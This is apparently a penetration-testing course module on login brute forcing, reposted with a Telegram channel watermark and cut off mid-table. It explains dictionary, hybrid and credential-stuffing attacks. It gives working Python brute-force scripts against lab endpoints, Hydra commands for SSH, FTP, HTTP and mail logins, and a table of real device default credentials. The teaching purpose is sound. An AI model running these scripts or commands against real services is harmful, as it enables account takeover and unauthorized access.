16. Login Brute Forcing

Introduction

Keys and passwords, the modern equivalent of locks and combinations, secure the digital
world. But what if someone tries every possible combination until they find the one that
opens the door? That, in essence, is brute forcing .

What is Brute Forcing?

In cybersecurity, brute forcing is a trial-and-error method used to crack passwords, login
credentials, or encryption keys. It involves systematically trying every possible combination
of characters until the correct one is found. The process can be likened to a thief trying every
key on a giant keyring until they find the one that unlocks the treasure chest.

The success of a brute force attack depends on several factors, including:

    The complexity of the password or key. Longer passwords with a mix of uppercase
    and lowercase letters, numbers, and symbols are exponentially more complex to crack.

    The computational power available to the attacker. Modern computers and
     specialized hardware can try billions of combinations per second, significantly reducing
     the time needed for a successful attack.
    The security measures in place. Account lockouts, CAPTCHAs, and other defenses
    can slow down or even thwart brute-force attempts.

How Brute Forcing Works

The brute force process can be visualized as follows:





   1. Start : The attacker initiates the brute force process, often with the aid of specialized
     software.
   2. Generate Possible Combination : The software generates a potential password or
    key combination based on predefined parameters, such as character sets and length.

   3. Apply Combination : The generated combination is attempted against the target
     system, such as a login form or encrypted file.
   4. Check if Successful : The system evaluates the attempted combination. If it matches
     the stored password or key, access is granted. Otherwise, the process continues.
      https://t.me/offenciveSec
   5. Access Granted : The attacker gains unauthorized access to the system or data.
   6. End : The process repeats, generating and testing new combinations until either the
     correct one is found or the attacker gives up.

Types of Brute Forcing

Brute forcing is not a monolithic entity but a collection of diverse techniques, each with its
strengths, weaknesses, and ideal use cases. Understanding these variations is crucial for
both attackers and defenders, as it enables the former to choose the most effective
approach and the latter to implement targeted countermeasures. The following table
provides a comparative overview of various brute-forcing methods:


 Method         Description         Example             Best Used When...

 Simple Brute    Systematically tries     Trying all           No prior information
 Force                all possible            combinations of         about the password
                  combinations of       lowercase letters from    is available, and
                   characters within a       'a' to 'z' for passwords   computational
                   defined character       of length 4 to 6.         resources are
                    set and length range.                         abundant.

 Dictionary     Uses a pre-compiled   Trying passwords      The target will likely
 Attack                list of common        from a list like          use a weak or easily
                  words, phrases, and    'rockyou.txt' against a   guessable password
                 passwords.             login form.            based on common
                                                                       patterns.

 Hybrid         Combines elements    Adding numbers or     The target might use
 Attack           of simple brute force    special characters to    a slightly modified
                and dictionary          the end of words from    version of a common
                    attacks, often        a dictionary list.         password.
                 appending or
                 prepending
                   characters to
                    dictionary words.

 Credential     Leverages leaked     Using a list of        A large set of leaked
 Stuffing        credentials from one   usernames and          credentials is
                   service to attempt     passwords leaked        available, and the
                 access to other        from a data breach to    target is suspected of
                    services, assuming      try logging into          reusing passwords
                  users reuse            various online          across multiple
                 passwords.            accounts.                services.


      https://t.me/offenciveSec
 Method         Description         Example             Best Used When...

 Password        Attempts a small set    Trying passwords like   Account lockout
 Spraying         of commonly used     'password123' or         policies are in place,
                passwords against a    'qwerty' against all      and the attacker
                    large number of       usernames in an       aims to avoid
                 usernames.            organization.            detection by
                                                               spreading attempts
                                                               across multiple
                                                                 accounts.

 Rainbow       Uses pre-computed    Pre-computing       A large number of
 Table Attack    tables of password    hashes for all possible   password hashes
                hashes to reverse     passwords of a        need to be cracked,
                hashes and recover    certain length and      and storage space
                     plaintext passwords    character set, then        for the rainbow
                     quickly.              comparing captured      tables is available.
                                    hashes against the
                                             table to find matches.

 Reverse         Targets a single       Using a leaked       A strong suspicion
 Brute Force    password against     password from one       exists that a
                    multiple usernames,    service to try logging     particular password
                    often used in            into multiple accounts     is being reused
                   conjunction with        with different            across multiple
                    credential stuffing     usernames.             accounts.
                    attacks.

 Distributed     Distributes the brute   Using a cluster of      The target password
 Brute Force     forcing workload       computers to perform    or key is highly
                  across multiple       a brute-force attack     complex, and a
                 computers or            significantly increases    single machine lacks
                  devices to             the number of           the computational
                   accelerate the         combinations that can   power to crack it
                  process.            be tried per second.      within a reasonable
                                                                 timeframe.

The Role of Brute Forcing in Penetration Testing

Penetration testing, or ethical hacking, is a proactive cybersecurity measure that simulates
real-world attacks to identify and address vulnerabilities before malicious actors can exploit
them. Brute forcing is a crucial tool in this process, particularly when assessing the resilience
of password-based authentication mechanisms.

While penetration tests encompass a range of techniques, brute forcing is often strategically
employed when:

     Other avenues are exhausted : Initial attempts to gain access, such as exploiting
    known vulnerabilities or utilizing social engineering tactics, may prove unsuccessful. In
    such scenarios, brute forcing is a viable alternative to overcome password barriers.
      https://t.me/offenciveSec
     Password policies are weak : If the target system employs lax password policies, it
     increases the likelihood of users having weak or easily guessable passwords. Brute
     forcing can effectively expose these vulnerabilities.

     Specific accounts are targeted : In some instances, penetration testers may focus
    on compromising specific user accounts, such as those with elevated privileges. Brute
     forcing can be tailored to target these accounts directly.

Password Security Fundamentals

The effectiveness of brute-force attacks hinges on the strength of the passwords it targets.
Understanding the fundamentals of password security is crucial for appreciating the
importance of robust password practices and the challenges posed by brute-force attacks.

The Importance of Strong Passwords

Passwords are the first line of defense in protecting sensitive information and systems. A
strong password is a formidable barrier, making it significantly harder for attackers to gain
unauthorized access through brute forcing or other techniques. The longer and more
complex a password is, the more combinations an attacker has to try, exponentially
increasing the time and resources required for a successful attack.

The Anatomy of a Strong Password

The National Institute of Standards and Technology  ( NIST ) provides guidelines for
creating strong passwords. These guidelines emphasize the following characteristics:

     Length : The longer the password, the better. Aim for a minimum of 12 characters, but
     longer is always preferable. The reasoning is simple: each additional character in a
    password dramatically increases the number of possible combinations. For instance, a
     6-character password using only lowercase letters has 26^6 (approximately 300 million)
     possible combinations. In contrast, an 8-character password has 26^8 (approximately
    200 billion) combinations. This exponential increase in possibilities makes longer
    passwords significantly more resistant to brute-force attacks.
     Complexity : Use uppercase and lowercase letters, numbers, and symbols. Avoid
     quickly guessable patterns or sequences. Including different character types expands
     the pool of potential characters for each position in the password. For example, a
    password using only lowercase letters has 26 possibilities per character, while a
    password using both uppercase and lowercase letters has 52 possibilities per
     character. This increased complexity makes it much harder for attackers to predict or
    guess passwords.

     Uniqueness : Don't reuse passwords across different accounts. Each account should
    have its own unique and strong password. If one account is compromised, all other
    accounts using the same password are also at risk. By using unique passwords for
    each account, you compartmentalize the potential damage of a breach.
      https://t.me/offenciveSec
     Randomness : Avoid using dictionary words, personal information, or common phrases.
    The more random the password, the harder it is to crack. Attackers often use wordlists
     containing common passwords and personal information to speed up their brute-force
     attempts. Creating a random password minimizes the chances of being included in
    such wordlists.

Common Password Weaknesses

Despite the importance of strong passwords, many users still rely on weak and easily
guessable passwords. Common weaknesses include:

     Short Passwords : Passwords with fewer than eight characters are particularly
     vulnerable to brute-force attacks, as the number of possible combinations is relatively
     small.

     Common Words and Phrases : Using dictionary words, names, or common phrases as
    passwords makes them susceptible to dictionary attacks, where attackers try a pre-
     defined list of common passwords.
     Personal Information : Incorporating personal information like birthdates, pet names,
     or addresses into passwords makes them easier to guess, especially if this information
      is publicly available on social media or other online platforms.
     Reusing Passwords : Using the same password across multiple accounts is risky. If
    one account is compromised, all other accounts using the same password are also at
      risk.

     Predictable Patterns : Using patterns like "qwerty" or "123456" or simple
     substitutions like "p@ssw0rd" makes passwords easy to guess, as these patterns are
     well-known to attackers.

Password Policies

Organizations often implement password policies to enforce the use of strong passwords.
These policies typically include requirements for:

     Minimum Length : The minimum number of characters a password must have.
     Complexity : The types of characters that must be included in a password (e.g.,
     uppercase, lowercase, numbers, symbols).

     Password Expiration : The frequency with which passwords must be changed.
     Password History : The number of previous passwords that cannot be reused.

While password policies can help improve password security, they can also lead to user
frustration and the adoption of poor password practices, such as writing passwords down or
using slight variations of the same password. When designing password policies, it's
important to balance security and usability.

The Perils of Default Credentials
      https://t.me/offenciveSec
One critical aspect of password security often overlooked is the danger posed by default
passwords . These pre-set passwords come with various devices, software, or online
services. They are often simple and easily guessable, making them a prime target for
attackers.

Default passwords significantly increase the success rate of brute-force attacks. Attackers
can leverage lists of common default passwords, dramatically reducing the search space
and accelerating the cracking process. In some cases, attackers may not even need to
perform a brute-force attack; they can try a few common default passwords and gain access
with minimal effort.

The prevalence of default passwords makes them a low-hanging fruit for attackers. They
provide an easy entry point into systems and networks, potentially leading to data breaches,
unauthorized access, and other malicious activities.


 Device/Manufacturer  Default           Default          Device Type
                   Username       Password

 Linksys Router        admin           admin            Wireless Router

 D-Link Router         admin           admin            Wireless Router

 Netgear Router        admin           password         Wireless Router

 TP-Link Router        admin           admin            Wireless Router

 Cisco Router           cisco              cisco            Network Router

 Asus Router          admin           admin            Wireless Router

 Belkin Router         admin           password         Wireless Router

 Zyxel Router          admin           1234              Wireless Router

 Samsung SmartCam   admin           4321              IP Camera

 Hikvision DVR        admin           12345               Digital Video Recorder
                                                    (DVR)

 Axis IP Camera         root             pass              IP Camera

 Ubiquiti UniFi AP       ubnt              ubnt              Wireless Access Point

 Canon Printer         admin           admin           Network Printer

 Honeywell            admin           1234            Smart Thermostat
 Thermostat

 Panasonic DVR       admin           12345               Digital Video Recorder
                                                    (DVR)


These are just a few examples of well-known default passwords. Attackers often compile
extensive lists of such passwords and use them in automated attacks.

      https://t.me/offenciveSec
Alongside default passwords, default usernames are another major security concern.
Manufacturers often ship devices with pre-set usernames, such as admin , root , or user .
You might have noticed in the table above how many use common usernames. These
usernames are widely known and often published in documentation or readily available
online. SecLists maintains a list of common usernames at top-usernames-shortlist.txt

Default usernames are a significant vulnerability because they give attackers a predictable
starting point. In many brute-force attacks, knowing the username is half the battle. With the
username already established, the attacker only needs to crack the password, and if the
device still uses a default password, the attack can be completed with minimal effort.

Even when default passwords are changed, retaining the default username still leaves
systems vulnerable to attacks. It drastically narrows the attack surface, as the hacker can
skip the process of guessing usernames and focus solely on the password.

Brute-forcing and Password Security

In a brute-force scenario, the strength of the target passwords becomes the attacker's
primary obstacle. A weak password is akin to a flimsy lock on a door – easily picked open
with minimal effort. Conversely, a strong password acts as a fortified vault, demanding
significantly more time and resources to breach.

For a pentester, this translates to a deeper understanding of the target's security posture:

     Evaluating System Vulnerability: Password policies, or their absence, and the
     likelihood of users employing weak passwords directly inform the potential success of a
     brute-force attack.
     Strategic Tool Selection: The complexity of the passwords dictates the tools and
    methodologies a pentester will deploy. A simple dictionary attack might suffice for weak
    passwords, while a more sophisticated, hybrid approach may be required to crack
     stronger ones.

     Resource Allocation: The estimated time and computational power needed for a
     brute-force attack is intrinsically linked to the complexity of the passwords. This
    knowledge is essential for effective planning and resource management.
     Exploiting Weak Points: Default passwords are often a system's Achilles' heel. A
     pentester's ability to identify and leverage these easily guessable credentials can
     provide a swift entry point into the target network.

In essence, a deep understanding of password security is a roadmap for a pentester
navigating the complexities of a brute-force attack. It unveils potential weak points, informs
strategic choices, and predicts the effort required for a successful breach. This knowledge,
however, is a double-edged sword. It also underscores the critical importance of robust
password practices for any organization seeking to defend against such attacks, highlighting
each user's pivotal role in safeguarding sensitive information.
      https://t.me/offenciveSec
Brute Force Attacks

To truly grasp the challenge of brute forcing, it's essential to understand the underlying
mathematics. The following formula determines the total number of possible combinations
for a password:


  Possible Combinations = Character Set Size^{Password Length}



For example, a 6-character password using only lowercase letters (character set size of 26)
has 26^6 (approximately 300 million) possible combinations. In contrast, an 8-character
password with the same character set has 26^8 (approximately 200 billion) combinations.
Adding uppercase letters, numbers, and symbols to the character set further expands the
search space exponentially.

This exponential growth in the number of combinations highlights the importance of
password length and complexity. Even a small increase in length or the inclusion of
additional character types can dramatically increase the time and resources required for a
successful brute-force attack.

Let's consider a few scenarios to illustrate the impact of password length and character set
on the search space:


               Password    Character Set        Possible Combinations
                Length

 Short and      6            Lowercase letters (a-  26^6 = 308,915,776
 Simple                            z)

 Longer but     8            Lowercase letters (a-  26^8 = 208,827,064,576
 Still Simple                     z)

 Adding         8            Lowercase and       52^8 = 53,459,728,531,456
 Complexity                   uppercase letters (a-
                                        z, A-Z)

 Maximum        12           Lowercase and       94^12 =
 Complexity                   uppercase letters,     475,920,493,781,698,549,504
                              numbers, and
                              symbols


As you can see, even a slight increase in password length or the inclusion of additional
character types dramatically expands the search space. This significantly increases the
number of possible combinations that an attacker must try, making brute-forcing increasingly
challenging and time-consuming. However, the time it takes to crack a password isn't just
dependent on the size of the search space—it also hinges on the attacker's available
computational power.
      https://t.me/offenciveSec
The more powerful the attacker's hardware (e.g., the number of GPUs, CPUs, or cloud-
based computing resources they can utilize), the more password guesses they can make
per second. While a complex password can take years to brute-force with a single machine,
a sophisticated attacker using a distributed network of high-performance computing
resources could reduce that time drastically.





The above chart illustrates an exponential relationship between password complexity and
cracking time. As the password length increases and the character set expands, the total
number of possible combinations grows exponentially. This significantly increases the time
required to crack the password, even with powerful computing resources.

Comparing the basic computer and the supercomputer:

     Basic Computer (1 million passwords/second): Adequate for cracking simple passwords
     quickly but becomes impractically slow for complex passwords. For instance, cracking
    an 8-character password using letters and digits would take approximately 6.92 years.
    Supercomputer (1 trillion passwords/second): Drastically reduces cracking times for
     simpler passwords. However, even with this immense power, cracking highly complex
    passwords can take an impractical amount of time. For example, a 12-character
    password with all ASCII characters would still take about 15000 years to crack.

Cracking the PIN

To follow along, start the target system via the question section at the bottom of the
page.

The instance application generates a random 4-digit PIN and exposes an endpoint ( /pin )
that accepts a PIN as a query parameter. If the provided PIN matches the generated one,
the application responds with a success message and a flag. Otherwise, it returns an error
message.
      https://t.me/offenciveSec
We will use this simple demonstration Python script to brute-force the /pin endpoint on the
API. Copy and paste this Python script below as pin-solver.py onto your machine. You
only need to modify the IP and port variables to match your target system information.


  import requests


  ip = "127.0.0.1"  # Change this to your instance IP address
  port = 1234       # Change this to your instance port number


  # Try every possible 4-digit PIN (from 0000 to 9999)
  for pin in range(10000):
      formatted_pin = f"{pin:04d}"  # Convert the number to a 4-digit string
  (e.g., 7 becomes "0007")
      print(f"Attempted PIN: {formatted_pin}")


      # Send the request to the server
      response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")


      # Check if the server responds with success and the flag is found
      if response.ok and 'flag' in response.json():  # .ok means status code
  is 200 (success)
          print(f"Correct PIN found: {formatted_pin}")
          print(f"Flag: {response.json()['flag']}")
          break



The Python script systematically iterates all possible 4-digit PINs (0000 to 9999) and sends
GET requests to the Flask endpoint with each PIN. It checks the response status code and
content to identify the correct PIN and capture the associated flag.


  python pin-solver.py


  ...
  Attempted PIN: 4039
  Attempted PIN: 4040
  Attempted PIN: 4041
  Attempted PIN: 4042
  Attempted PIN: 4043
  Attempted PIN: 4044
  Attempted PIN: 4045
  Attempted PIN: 4046
  Attempted PIN: 4047
  Attempted PIN: 4048
  Attempted PIN: 4049
  Attempted PIN: 4050
  Attempted PIN: 4051
  Attempted PIN: 4052
  Correct PIN https://t.me/offenciveSecfound: 4053
  Flag: HTB{...}



The script's output will show the progression of the brute-force attack, displaying each
attempted PIN and its corresponding result. The final output will reveal the correct PIN and
the captured flag, demonstrating the successful completion of the brute-force attack.

Dictionary Attacks

While comprehensive, the brute-force approach can be time-consuming and resource-
intensive, especially when dealing with complex passwords. That's where dictionary attacks
come in.

The Power of Words

The effectiveness of a dictionary attack lies in its ability to exploit the human tendency to
prioritize memorable passwords over secure ones. Despite repeated warnings, many
individuals continue to opt for passwords based on readily available information such as
dictionary words, common phrases, names, or easily guessable patterns. This predictability
makes them vulnerable to dictionary attacks, where attackers systematically test a pre-
defined list of potential passwords against the target system.

The success of a dictionary attack hinges on the quality and specificity of the wordlist used.
A well-crafted wordlist tailored to the target audience or system can significantly increase the
probability of a successful breach. For instance, if the target is a system frequented by
gamers, a wordlist enriched with gaming-related terminology and jargon would prove more
effective than a generic dictionary. The more closely the wordlist reflects the likely password
choices of the target, the higher the chances of a successful attack.

At its core, the concept of a dictionary attack is rooted in understanding human psychology
and common password practices. By leveraging this insight, attackers can efficiently crack
passwords that might otherwise necessitate an impractically lengthy brute-force attack. In
this context, the power of words resides in their ability to exploit human predictability and
compromise otherwise robust security measures.

Brute Force vs. Dictionary Attack

The fundamental distinction between a brute-force and a dictionary attack lies in their
methodology for generating potential password candidates:

     Brute Force : A pure brute-force attack systematically tests every possible
     combination of characters within a predetermined set and length. While this approach
    guarantees eventual success given enough time, it can be extremely time-consuming,
      particularly against longer or complex passwords.
      https://t.me/offenciveSec
     Dictionary Attack : In stark contrast, a dictionary attack employs a pre-compiled list
     of words and phrases, dramatically reducing the search space. This targeted
    methodology results in a far more efficient and rapid attack, especially when the target
    password is suspected to be a common word or phrase.

 Feature          Dictionary Attack  Brute Force     Explanation
                                    Attack

 Efficiency      Considerably      Can be            Dictionary attacks leverage a
                     faster and more     extremely time-   pre-defined list, significantly
                     resource-efficient.   consuming and   narrowing the search space
                                       resource-        compared to brute-force.
                                           intensive.

 Targeting       Highly adaptable   No inherent       Wordlists can incorporate
                and can be          targeting          information relevant to the
                      tailored to specific   capability.         target (e.g., company name,
                    targets or                         employee names), increasing
                  systems.                              the success rate.

 Effectiveness   Exceptionally        Effective                If the target password is within
                      effective against     against all        the dictionary, it will be swiftly
               weak or           passwords        discovered. Brute force, while
                commonly used     given sufficient    universally applicable, can be
                  passwords.         time and          impractical for complex
                                       resources.       passwords due to the sheer
                                                  volume of combinations.

 Limitations      Ineffective          Often         A truly random password is
                   against complex,    impractical for     unlikely to appear in any
                 randomly           lengthy or          dictionary, rendering this
                  generated           highly complex    attack futile. The astronomical
                  passwords.         passwords.      number of possible
                                                      combinations for lengthy
                                                  passwords can make brute-
                                                            force attacks infeasible.


Consider a hypothetical scenario where an attacker targets a company's employee login
portal. The attacker might construct a specialized wordlist that incorporates the following:

    Commonly used, weak passwords (e.g., "password123," "qwerty")
    The company name and variations thereof

    Names of employees or departments
     Industry-specific jargon

By deploying this targeted wordlist in a dictionary attack, the attacker significantly elevates
their likelihood of successfully cracking employee passwords compared to a purely random
brute-force endeavor.
      https://t.me/offenciveSec
Building and Utilizing Wordlists

Wordlists can be obtained from various sources, including:

     Publicly Available Lists : The internet hosts a plethora of freely accessible
     wordlists, encompassing collections of commonly used passwords, leaked credentials
    from data breaches, and other potentially valuable data. Repositories like SecLists offer
     various wordlists catering to various attack scenarios.
     Custom-Built Lists : Penetration testers can craft their wordlists by leveraging
     information gleaned during the reconnaissance phase. This might include details about
     the target's interests, hobbies, personal information, or any other data for password
     creation.

     Specialized Lists : Wordlists can be further refined to target specific industries,
     applications, or even individual companies. These specialized lists increase the
     likelihood of success by focusing on passwords that are more likely to be used within a
     particular context.
     Pre-existing Lists : Certain tools and frameworks come pre-packaged with
    commonly used wordlists. For instance, penetration testing distributions like ParrotSec
     often include wordlists like rockyou.txt , a massive collection of leaked passwords,
     readily available for use.

Here is a table of some of the more useful wordlists for login brute-forcing:


 Wordlist                         Description          Typical Use    Source

 rockyou.txt                A popular password   Commonly      RockYou
                                        wordlist containing    used for         breach
                                         millions of           password        dataset
                                passwords leaked     brute force
                                  from the RockYou      attacks.
                                    breach.

 top-usernames-shortlist.txt   A concise list of the    Suitable for      SecLists
                               most common         quick brute
                                 usernames.            force
                                                  username
                                                            attempts.

 xato-net-10-million-         A more extensive     Used for         SecLists
 usernames.txt                               list of 10 million       thorough
                                 usernames.         username
                                                            brute forcing.

 2023-                    A list of the 200         Effective for      SecLists
 200_most_used_passwords.txt    most commonly        targeting
                               used passwords as   commonly
                                         of 2023.              reused
                                                      passwords.
      https://t.me/offenciveSec
 Wordlist                         Description          Typical Use    Source

 Default-Credentials/default-  A list of default         Ideal for trying    SecLists
 passwords.txt                 usernames and        default
                                passwords             credentials.
                              commonly used in
                                        routers, software,
                               and other devices.

Throwing a dictionary at the problem

To follow along, start the target system via the question section at the bottom of the
page.

The instance application creates a route (`/dictionary`) that handles POST requests. It
expects a `password` parameter in the request's form data. Upon receiving a request, it
compares the submitted password against the expected value. If there's a match, it responds
with a JSON object containing a success message and the flag. Otherwise, it returns an
error message with a 401 status code (Unauthorized).

Copy and paste this Python script below as dictionary-solver.py onto your machine.
You only need to modify the IP and port variables to match your target system information.


  import requests


  ip = "127.0.0.1"  # Change this to your instance IP address
  port = 1234       # Change this to your instance port number


  # Download a list of common passwords from the web and split it into lines
  passwords =
  requests.get("https://raw.githubusercontent.com/danielmiessler/SecLists/ma
  ster/Passwords/500-worst-passwords.txt").text.splitlines()


  # Try each password from the list
  for password in passwords:
      print(f"Attempted password: {password}")


      # Send a POST request to the server with the password
      response = requests.post(f"http://{ip}:{port}/dictionary", data=
  {'password': password})


      # Check if the server responds with success and contains the 'flag'
      if response.ok and 'flag' in response.json():
          print(f"Correct password found: {password}")
          print(f"Flag: {response.json()['flag']}")
          break
      https://t.me/offenciveSec
The Python script orchestrates the dictionary attack. It performs the following steps:

   1. Downloads the Wordlist : First, the script fetches a wordlist of 500 commonly used
    (and therefore weak) passwords from SecLists using the requests library.
   2. Iterates and Submits Passwords : It then iterates through each password in the
    downloaded wordlist. For each password, it sends a POST request to the Flask
     application's /dictionary endpoint, including the password in the request's form data.
   3. Analyzes Responses : The script checks the response status code after each request.
        If it's 200 (OK), it examines the response content further. If the response contains the
      "flag" key, it signifies a successful login. The script then prints the discovered password
    and the captured flag.
   4. Continues or Terminates : If the response doesn't indicate success, the script
    proceeds to the next password in the wordlist. This process continues until the correct
    password is found or the entire wordlist is exhausted.


  python3 dictionary-solver.py


  ...
  Attempted password: turtle
  Attempted password: tiffany
  Attempted password: golf
  Attempted password: bear
  Attempted password: tiger
  Correct password found: ...
  Flag: HTB{...}


Hybrid Attacks




Many organizations implement policies requiring users to change their passwords
periodically to enhance security. However, these policies can inadvertently breed predictable
password patterns if users are not adequately educated on proper password hygiene.




      https://t.me/offenciveSec
Unfortunately, a widespread and insecure practice among users is making minor
modifications to their passwords when forced to change them. This often manifests as
appending a number or a special character to the end of the current password. For instance,
a user might have an initial password like "Summer2023" and then, when prompted to
update it, change it to "Summer2023!" or "Summer2024."

This predictable behavior creates a loophole that hybrid attacks can exploit ruthlessly.
Attackers capitalize on this human tendency by employing sophisticated techniques that
combine the strengths of dictionary and brute-force attacks, drastically increasing the
likelihood of successful password breaches.

Hybrid Attacks in Action

Let's illustrate this with a practical example. Consider an attacker targeting an organization
known to enforce regular password changes.





The attacker begins by launching a dictionary attack, using a wordlist curated with common
passwords, industry-specific terms, and potentially personal information related to the
      https://t.me/offenciveSec
organization or its employees. This phase attempts to quickly identify any low-hanging fruit -
accounts protected by weak or easily guessable passwords.

However, if the dictionary attack proves unsuccessful, the hybrid attack seamlessly
transitions into a brute-force mode. Instead of randomly generating password combinations,
it strategically modifies the words from the original wordlist, appending numbers, special
characters, or even incrementing years, as in our "Summer2023" example.

This targeted brute-force approach drastically reduces the search space compared to a
traditional brute-force attack while covering many potential password variations that users
might employ to comply with the password change policy.

The Power of Hybrid Attacks

The effectiveness of hybrid attacks lies in their adaptability and efficiency. They leverage the
strengths of both dictionary and brute-force techniques, maximizing the chances of cracking
passwords, especially in scenarios where users fall into predictable patterns.

It's important to note that hybrid attacks are not limited to the password change scenario
described above. They can be tailored to exploit any observed or suspected password
patterns within a target organization. Let's consider a scenario where you have access to a
common passwords wordlist, and you're targeting an organization with the following
password policy:

    Minimum length: 8 characters
    Must include:
          At least one uppercase letter

          At least one lowercase letter
          At least one number

To extract only the passwords that adhere to this policy, we can leverage the powerful
command-line tools available on most Linux/Unix-based systems by default, specifically
grep paired with regex. We are going to use the darkweb2017-top10000.txt password list
for this. First, download the wordlist


  wget
  https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/maste
  r/Passwords/darkweb2017-top10000.txt



Next, we need to start matching that wordlist to the password policy.


  grep -E '^.{8,}$' darkweb2017-top10000.txt > darkweb2017-minlength.txt

      https://t.me/offenciveSec
This initial grep command targets the core policy requirement of a minimum password
length of 8 characters. The regular expression ^.{8,}$ acts as a filter, ensuring that only
passwords containing at least 8 characters are passed through and saved in a temporary file
named darkweb2017-minlength.txt .


  grep -E '[A-Z]' darkweb2017-minlength.txt > darkweb2017-uppercase.txt



Building upon the previous filter, this grep command enforces the policy's demand for at
least one uppercase letter. The regular expression [A-Z] ensures that any password
lacking an uppercase letter is discarded, further refining the list saved in darkweb2017-
uppercase.txt .


  grep -E '[a-z]' darkweb2017-uppercase.txt > darkweb2017-lowercase.txt



Maintaining the filtering chain, this grep command ensures compliance with the policy's
requirement for at least one lowercase letter. The regular expression [a-z] serves as the
filter, keeping only passwords that include at least one lowercase letter and storing them in
darkweb2017-lowercase.txt .


  grep -E '[0-9]' darkweb2017-lowercase.txt > darkweb2017-number.txt



This last grep command tackles the policy's numerical requirement. The regular expression
[0-9] acts as a filter, ensuring that passwords containing at least one numerical digit are
preserved in darkweb2017-number.txt .


  wc -l darkweb2017-number.txt


  89 darkweb2017-number.txt



As demonstrated by the output above, meticulously filtering the extensive 10,000-password
list against the password policy has dramatically narrowed down our potential passwords to
89. This drastic reduction in the search space represents a significant boost in efficiency for
any subsequent password cracking attempts. A smaller, targeted list translates to a faster
and more focused attack, optimizing the use of computational resources and increasing the
likelihood of a successful breach.

Credential Stuffing: Leveraging Stolen Data for
Unauthorized Access
      https://t.me/offenciveSec
Credential stuffing attacks exploit the unfortunate reality that many users reuse passwords
across multiple online accounts. This pervasive practice, often driven by the desire for
convenience and the challenge of managing numerous unique credentials, creates a fertile
ground for attackers to exploit.

It's a multi-stage process that begins with attackers acquiring lists of compromised
usernames and passwords. These lists can stem from large-scale data breaches or be
compiled through phishing scams and malware. Notably, publicly available wordlists like
rockyou or those found in seclists can also serve as a starting point, offering attackers a
trove of commonly used passwords.

Once armed with these credentials, attackers identify potential targets - online services likely
used by the individuals whose information they possess. Social media, email providers,
online banking, and e-commerce sites are prime targets due to the sensitive data they often
hold.

The attack then shifts into an automated phase. Attackers use tools or scripts to
systematically test the stolen credentials against the chosen targets, often mimicking normal
user behavior to avoid detection. This allows them to rapidly test vast numbers of
credentials, increasing their chances of finding a match.

A successful match grants unauthorized access, opening the door to various malicious
activities, from data theft and identity fraud to financial crimes. The compromised account
may be a launchpad for further attacks, spreading malware, or infiltrating connected
systems.

The Password Reuse Problem

The core issue fueling credential stuffing's success is the pervasive practice of password
reuse. When users rely on the same or similar passwords for multiple accounts, a breach on
one platform can have a domino effect, compromising numerous other accounts. This
highlights the urgent need for strong, unique passwords for every online service, coupled
with proactive security measures like multi-factor authentication.

Hydra
      https://t.me/offenciveSec
Hydra is a fast network login cracker that supports numerous attack protocols. It is a
versatile tool that can brute-force a wide range of services, including web applications,
remote login services like SSH and FTP, and even databases.

Hydra's popularity stems from its:

     Speed and Efficiency : Hydra utilizes parallel connections to perform multiple login
     attempts simultaneously, significantly speeding up the cracking process.

     Flexibility : Hydra supports many protocols and services, making it adaptable to
     various attack scenarios.
     Ease of Use : Hydra is relatively easy to use despite its power, with a straightforward
    command-line interface and clear syntax.

Installation

Hydra often comes pre-installed on popular penetration testing distributions. You can verify
its presence by running:


  hydra -h



If Hydra is not installed or you are using a different Linux distribution, you can install it from
the package repository:


  sudo apt-get -y update
  sudo apt-get -y install hydra


Basic Usage

Hydra's basic syntax is:


  hydra [login_options] [password_options] [attack_options]
  [service_options]




      https://t.me/offenciveSec
Parameter          Explanation       Usage Example

-l LOGIN or -L     Login options:        hydra -l admin ... or hydra -L
FILE                Specify either a       usernames.txt ...
                       single username ( -
                   l ) or a file
                      containing a list of
                  usernames ( -L ).

-p PASS or -P      Password options:    hydra -p password123 ... or hydra -P
FILE                Provide either a      passwords.txt ...
                       single password ( -
                   p ) or a file
                      containing a list of
                   passwords ( -P ).

-t TASKS            Tasks: Define the     hydra -t 4 ...
                  number of parallel
                      tasks (threads) to
                       run, potentially
                    speeding up the
                        attack.

-f                  Fast mode: Stop      hydra -f ...
                      the attack after the
                               first successful
                        login is found.

-s PORT               Port: Specify a non-   hydra -s 2222 ...
                       default port for the
                        target service.

-v or -V           Verbose output:      hydra -v ... or hydra -V ... (for even
                     Display detailed     more verbosity)
                      information about
                      the attack's
                      progress, including
                     attempts and
                         results.

service://server   Target: Specify the    hydra ssh://192.168.1.100
                      service (e.g., ssh ,
                   http , ftp ) and
                      the target server's
                    address or
                   hostname.

/OPT                  Service-specific      hydra http-
                       options: Provide      get://example.com/login.php -m
                   any additional        "POST:user=^USER^&pass=^PASS^" (for
                      options required by  HTTP form-based authentication)
                      the target service.
      https://t.me/offenciveSec
Hydra Services

Hydra services essentially define the specific protocols or services that Hydra can target.
They enable Hydra to interact with different authentication mechanisms used by various
systems, applications, and network services. Each module is designed to understand a
particular protocol's communication patterns and authentication requirements, allowing
Hydra to send appropriate login requests and interpret the responses. Below is a table of
commonly used services:


 Hydra    Service/Protocol  Description  Example Command
 Service

  ftp         File Transfer      Used to      hydra -l admin -P /path/to/password_lis
           Protocol (FTP)      brute-force    ftp://192.168.1.100
                                 login
                                credentials
                                    for FTP
                                services,
                         commonly
                          used to
                                 transfer
                                        files over a
                              network.

 ssh      Secure Shell       Targets       hydra -l root -P /path/to/password_list
          (SSH)         SSH         ssh://192.168.1.100
                               services to
                                brute-force
                                 credentials,
                         commonly
                          used for
                            secure
                           remote
                                 login to
                             systems.

 http-    HTTP Web       Used to      hydra -l admin -P /path/to/password_lis
 get/post  Services            brute-force    http-post-form
                                 login         "/login.php:user=^USER^&pass=^PASS^:F=i
                                credentials
                                    for HTTP
                       web login
                            forms using
                                  either GET
                                or POST
                               requests.

      https://t.me/offenciveSec
Hydra    Service/Protocol  Description  Example Command
Service

smtp     Simple Mail        Attacks       hydra -l admin -P /path/to/password_lis
          Transfer Protocol   email        smtp://mail.server.com
                             servers by
                               brute-
                                forcing
                                login
                               credentials
                                   for SMTP,
                        commonly
                         used to
                         send
                              emails.

pop3     Post Office         Targets       hydra -l [email protected] -P
          Protocol (POP3)    email        /path/to/password_list.txt
                                  retrieval      pop3://mail.server.com
                              services to
                               brute-force
                               credentials
                                   for POP3
                                  login.

imap      Internet          Used to      hydra -l [email protected] -P
        Message Access   brute-force    /path/to/password_list.txt
          Protocol            credentials    imap://mail.server.com
                                   for IMAP
                               services,
